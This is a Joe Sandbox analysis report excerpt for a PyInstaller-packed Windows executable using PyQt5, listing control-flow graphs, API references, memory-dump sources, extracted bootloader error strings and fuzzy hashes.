                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String@@$File$Info@@$Array@@Byte$Dir@@$String@@@$?absolute?prepend@DeallocV2@@$?append@?const?exists@?fromAttrData@Data@@Dir@E00@ImportImport_Latin1Latin1@ModuleNativeObject_Path@RegisterResourceSeparators@String
                                                                                                                                                                                                                • String ID: PyQt5$Qt5$[Paths]Prefix = $__file__
                                                                                                                                                                                                                • API String ID: 1527562194-1811816995
                                                                                                                                                                                                                • Opcode ID: 4387ce16ed7412130aa7abe2ee69e690a078bc2e12c300fde2d5cb285499e566
                                                                                                                                                                                                                • Instruction ID: e70d3c6b0cb7e260d0887aa15a12a91ba5779bc69c485cc15ba09710428d914b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4387ce16ed7412130aa7abe2ee69e690a078bc2e12c300fde2d5cb285499e566
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C76151F1A0AA47D6EA009F34E858ABA7361FF85795F485031D54E23668FF3CE589C704

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Module_$DeallocDictString$Capsule_Create2Dict_Err_ErrorFatalImportImport_ItemModulePointer
                                                                                                                                                                                                                • String ID: PyQt5.sip$PyQt5.sip._C_API$PyQt5.sip._C_API is missing or has the wrong type$Unable to import qtcore_qt_metacast$_C_API$qtcore_qt_metacall$qtcore_qt_metacast$qtcore_qt_metaobject
                                                                                                                                                                                                                • API String ID: 3730020059-1457681641
                                                                                                                                                                                                                • Opcode ID: d97cc0a104ebc1fb0cbdca144541f3e97880e9dcb34ded454c8895af578c70a2
                                                                                                                                                                                                                • Instruction ID: df2ca362b91f668166db1ad876df2b1ee97ece41cc31d6df62a83918384daea7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d97cc0a104ebc1fb0cbdca144541f3e97880e9dcb34ded454c8895af578c70a2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7841F8E5E0AA4385FA40EB35E868A7937A0BF48F84F4C4075C94E67765EF7DE4898304

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 431 7ff60b121950-7ff60b12198b call 7ff60b1245c0 434 7ff60b121c4e-7ff60b121c72 call 7ff60b12c550 431->434 435 7ff60b121991-7ff60b1219d1 call 7ff60b127f90 431->435 440 7ff60b1219d7-7ff60b1219e7 call 7ff60b1306d4 435->440 441 7ff60b121c3b-7ff60b121c3e call 7ff60b13004c 435->441 446 7ff60b1219e9-7ff60b121a03 call 7ff60b134f08 call 7ff60b122910 440->446 447 7ff60b121a08-7ff60b121a24 call 7ff60b13039c 440->447 445 7ff60b121c43-7ff60b121c4b 441->445 445->434 446->441 453 7ff60b121a26-7ff60b121a40 call 7ff60b134f08 call 7ff60b122910 447->453 454 7ff60b121a45-7ff60b121a5a call 7ff60b134f28 447->454 453->441 460 7ff60b121a7b-7ff60b121b05 call 7ff60b121c80 * 2 call 7ff60b1306d4 call 7ff60b134f44 454->460 461 7ff60b121a5c-7ff60b121a76 call 7ff60b134f08 call 7ff60b122910 454->461 475 7ff60b121b0a-7ff60b121b14 460->475 461->441 476 7ff60b121b16-7ff60b121b30 call 7ff60b134f08 call 7ff60b122910 475->476 477 7ff60b121b35-7ff60b121b4e call 7ff60b13039c 475->477 476->441 483 7ff60b121b6f-7ff60b121b8b call 7ff60b130110 477->483 484 7ff60b121b50-7ff60b121b6a call 7ff60b134f08 call 7ff60b122910 477->484 491 7ff60b121b8d-7ff60b121b99 call 7ff60b122710 483->491 492 7ff60b121b9e-7ff60b121bac 483->492 484->441 491->441 492->441 494 7ff60b121bb2-7ff60b121bb9 492->494 497 7ff60b121bc1-7ff60b121bc7 494->497 498 7ff60b121bc9-7ff60b121bd6 497->498 499 7ff60b121be0-7ff60b121bef 497->499 500 7ff60b121bf1-7ff60b121bfa 498->500 499->499 499->500 501 7ff60b121bfc-7ff60b121bff 500->501 502 7ff60b121c0f 500->502 501->502 503 7ff60b121c01-7ff60b121c04 501->503 504 7ff60b121c11-7ff60b121c24 502->504 503->502 505 7ff60b121c06-7ff60b121c09 503->505 506 7ff60b121c26 504->506 507 7ff60b121c2d-7ff60b121c39 504->507 505->502 508 7ff60b121c0b-7ff60b121c0d 505->508 506->507 507->441 507->497 508->504
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B127F90: _fread_nolock.LIBCMT ref: 00007FF60B12803A
                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF60B121A1B
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B122910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF60B121B6A), ref: 00007FF60B12295E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                • Opcode ID: 6a04d0c4c8a0b99f23b16d6d676f1581d6c74e17851155a383b4fbd0f348e88e
                                                                                                                                                                                                                • Instruction ID: 5c97e28fd9c74969582b2d2cac5b7ffb802d759c5f35c89c2b4c36a9b3441b98
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a04d0c4c8a0b99f23b16d6d676f1581d6c74e17851155a383b4fbd0f348e88e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC81A271A0C68696EB20DB25D0402BA33A0EF4D78CF64C471D98FD77A5DE3CE9658740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                • Opcode ID: 60a4f7716322392174b45f0900a3bf04e5f00cb62b5f775a2b3fa26e9f7385d7
                                                                                                                                                                                                                • Instruction ID: ec3bb898d4a52fb4b57048cb217f8ea77630ef5141b5096522c222b39f267e14
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60a4f7716322392174b45f0900a3bf04e5f00cb62b5f775a2b3fa26e9f7385d7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40418121A0864696EA10DB21D4001B96390BF4E79CF64C5B2ED4FD7BA9EF3CE9228744

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 692 7ff60b121210-7ff60b12126d call 7ff60b12bd80 695 7ff60b121297-7ff60b1212af call 7ff60b134f44 692->695 696 7ff60b12126f-7ff60b121296 call 7ff60b122710 692->696 701 7ff60b1212b1-7ff60b1212cf call 7ff60b134f08 call 7ff60b122910 695->701 702 7ff60b1212d4-7ff60b1212e4 call 7ff60b134f44 695->702 713 7ff60b121439-7ff60b12146d call 7ff60b12ba60 call 7ff60b134f30 * 2 701->713 708 7ff60b1212e6-7ff60b121304 call 7ff60b134f08 call 7ff60b122910 702->708 709 7ff60b121309-7ff60b12131b 702->709 708->713 712 7ff60b121320-7ff60b12133d call 7ff60b13039c 709->712 718 7ff60b121342-7ff60b121345 712->718 721 7ff60b12134b-7ff60b121355 call 7ff60b130110 718->721 722 7ff60b121431 718->722 721->722 728 7ff60b12135b-7ff60b121367 721->728 722->713 730 7ff60b121370-7ff60b121398 call 7ff60b12a1c0 728->730 733 7ff60b121416-7ff60b12142c call 7ff60b122710 730->733 734 7ff60b12139a-7ff60b12139d 730->734 733->722 735 7ff60b12139f-7ff60b1213a9 734->735 736 7ff60b121411 734->736 738 7ff60b1213ab-7ff60b1213c1 call 7ff60b130adc 735->738 739 7ff60b1213d4-7ff60b1213d7 735->739 736->733 749 7ff60b1213cf-7ff60b1213d2 738->749 750 7ff60b1213c3-7ff60b1213cd call 7ff60b130110 738->750 741 7ff60b1213d9-7ff60b1213e7 call 7ff60b149e30 739->741 742 7ff60b1213ea-7ff60b1213ef 739->742 741->742 742->730 744 7ff60b1213f5-7ff60b1213f8 742->744 747 7ff60b1213fa-7ff60b1213fd 744->747 748 7ff60b12140c-7ff60b12140f 744->748 747->733 751 7ff60b1213ff-7ff60b121407 747->751 748->722 749->733 750->742 750->749 751->712
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                • Opcode ID: 096f828560730c5e91f8963ea1229aecabbed89a92b0e893cc7cf6d4f043b132
                                                                                                                                                                                                                • Instruction ID: 5a3ebd129502a81ba5a116bf94d2a490b958d4b36bdb33732e3519fc6cbeca59
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 096f828560730c5e91f8963ea1229aecabbed89a92b0e893cc7cf6d4f043b132
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB51D622A0868255EA20DB15E4403BA6291FF8EB9CF648175ED4FD77E5EF3CE921C700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF60B123804), ref: 00007FF60B1236E1
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF60B123804), ref: 00007FF60B1236EB
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B122C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF60B123706,?,00007FF60B123804), ref: 00007FF60B122C9E
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B122C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF60B123706,?,00007FF60B123804), ref: 00007FF60B122D63
                                                                                                                                                                                                                  • Part of subcall function 00007FF60B122C50: MessageBoxW.USER32 ref: 00007FF60B122D99
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                • Instruction ID: 6c281b950de8731c7c10a53ca62a22462c151286a2d7df2c5a3fdff58c330c51
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB217161F1C64281FA209724E8543BA2260BF9D39CF60C172E66FC65F5EF2CEA15C344

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?exists@Bool_File@@FromLong$String@@@
                                                                                                                                                                                                                • String ID: QFile$exists$exists(self) -> boolexists(fileName: Optional[str]) -> bool
                                                                                                                                                                                                                • API String ID: 4069061368-664237890
                                                                                                                                                                                                                • Opcode ID: c6c1293d2724aa804bcbcc55db94a0725c9e768d7634a69e20247136c4c67c60
                                                                                                                                                                                                                • Instruction ID: 293570117cc43e882caeb41fdf893e0efdadbc3e49ec45af59c4eaab09319042
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6c1293d2724aa804bcbcc55db94a0725c9e768d7634a69e20247136c4c67c60
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E13141B5A19B46C2DB409F26E448AA933B4FF48B85F484032D98E57764DF3CD558C744

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 862 7ff60b13ba5c-7ff60b13ba82 863 7ff60b13ba9d-7ff60b13baa1 862->863 864 7ff60b13ba84-7ff60b13ba98 call 7ff60b134ee8 call 7ff60b134f08 862->864 865 7ff60b13be77-7ff60b13be83 call 7ff60b134ee8 call 7ff60b134f08 863->865 866 7ff60b13baa7-7ff60b13baae 863->866 878 7ff60b13be8e 864->878 884 7ff60b13be89 _invalid_parameter_noinfo 865->884 866->865 869 7ff60b13bab4-7ff60b13bae2 866->869 869->865 872 7ff60b13bae8-7ff60b13baef 869->872 875 7ff60b13bb08-7ff60b13bb0b 872->875 876 7ff60b13baf1-7ff60b13bb03 call 7ff60b134ee8 call 7ff60b134f08 872->876 881 7ff60b13bb11-7ff60b13bb17 875->881 882 7ff60b13be73-7ff60b13be75 875->882 876->884 883 7ff60b13be91-7ff60b13bea8 878->883 881->882 886 7ff60b13bb1d-7ff60b13bb20 881->886 882->883 884->878 886->876 888 7ff60b13bb22-7ff60b13bb47 886->888 890 7ff60b13bb49-7ff60b13bb4b 888->890 891 7ff60b13bb7a-7ff60b13bb81 888->891 894 7ff60b13bb4d-7ff60b13bb54 890->894 895 7ff60b13bb72-7ff60b13bb78 890->895 892 7ff60b13bb56-7ff60b13bb6d call 7ff60b134ee8 call 7ff60b134f08 _invalid_parameter_noinfo 891->892 893 7ff60b13bb83-7ff60b13bbab call 7ff60b13d5fc call 7ff60b13a948 * 2 891->893 913 7ff60b13bd00 892->913 926 7ff60b13bbc8-7ff60b13bbf3 call 7ff60b13c284 893->926 927 7ff60b13bbad-7ff60b13bbc3 call 7ff60b134f08 call 7ff60b134ee8 893->927 894->892 894->895 897 7ff60b13bbf8-7ff60b13bc0f 895->897 900 7ff60b13bc8a-7ff60b13bc94 call 7ff60b14391c 897->900 901 7ff60b13bc11-7ff60b13bc19 897->901 911 7ff60b13bc9a-7ff60b13bcaf 900->911 912 7ff60b13bd1e 900->912 901->900 905 7ff60b13bc1b-7ff60b13bc1d 901->905 905->900 909 7ff60b13bc1f-7ff60b13bc35 905->909 909->900 914 7ff60b13bc37-7ff60b13bc43 909->914 911->912 916 7ff60b13bcb1-7ff60b13bcc3 GetConsoleMode 911->916 920 7ff60b13bd23-7ff60b13bd43 ReadFile 912->920 917 7ff60b13bd03-7ff60b13bd0d call 7ff60b13a948 913->917 914->900 918 7ff60b13bc45-7ff60b13bc47 914->918 916->912 923 7ff60b13bcc5-7ff60b13bccd 916->923 917->883 918->900 925 7ff60b13bc49-7ff60b13bc61 918->925 921 7ff60b13bd49-7ff60b13bd51 920->921 922 7ff60b13be3d-7ff60b13be46 GetLastError 920->922 921->922 928 7ff60b13bd57 921->928 931 7ff60b13be48-7ff60b13be5e call 7ff60b134f08 call 7ff60b134ee8 922->931 932 7ff60b13be63-7ff60b13be66 922->932 923->920 930 7ff60b13bccf-7ff60b13bcf1 ReadConsoleW 923->930 925->900 934 7ff60b13bc63-7ff60b13bc6f 925->934 926->897 927->913 936 7ff60b13bd5e-7ff60b13bd73 928->936 938 7ff60b13bcf3 GetLastError 930->938 939 7ff60b13bd12-7ff60b13bd1c 930->939 931->913 942 7ff60b13bcf9-7ff60b13bcfb call 7ff60b134e7c 932->942 943 7ff60b13be6c-7ff60b13be6e 932->943 934->900 941 7ff60b13bc71-7ff60b13bc73 934->941 936->917 946 7ff60b13bd75-7ff60b13bd80 936->946 938->942 939->936 941->900 949 7ff60b13bc75-7ff60b13bc85 941->949 942->913 943->917 951 7ff60b13bda7-7ff60b13bdaf 946->951 952 7ff60b13bd82-7ff60b13bd9b call 7ff60b13b674 946->952 949->900 955 7ff60b13be2b-7ff60b13be38 call 7ff60b13b4b4 951->955 956 7ff60b13bdb1-7ff60b13bdc3 951->956 959 7ff60b13bda0-7ff60b13bda2 952->959 955->959 960 7ff60b13be1e-7ff60b13be26 956->960 961 7ff60b13bdc5 956->961 959->917 960->917 963 7ff60b13bdca-7ff60b13bdd1 961->963 964 7ff60b13be0d-7ff60b13be18 963->964 965 7ff60b13bdd3-7ff60b13bdd7 963->965 964->960 966 7ff60b13bdd9-7ff60b13bde0 965->966 967 7ff60b13bdf3 965->967 966->967 969 7ff60b13bde2-7ff60b13bde6 966->969 968 7ff60b13bdf9-7ff60b13be09 967->968 968->963 970 7ff60b13be0b 968->970 969->967 971 7ff60b13bde8-7ff60b13bdf1 969->971 970->960 971->968
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                • Instruction ID: d87c90136839e926facbae397fbc7e4c083bd2c273166a1861d736ae6922bc74
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BC1E122A0C68681E6609B1594402BE3B54FB89F98F7981B1EA4FC37B5FF7DE8458740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                                                                                                                                                • Instruction ID: 98500db4fb563a594ef4599f05a80e44967fb80b36fb4e66a2907edd6773a11c
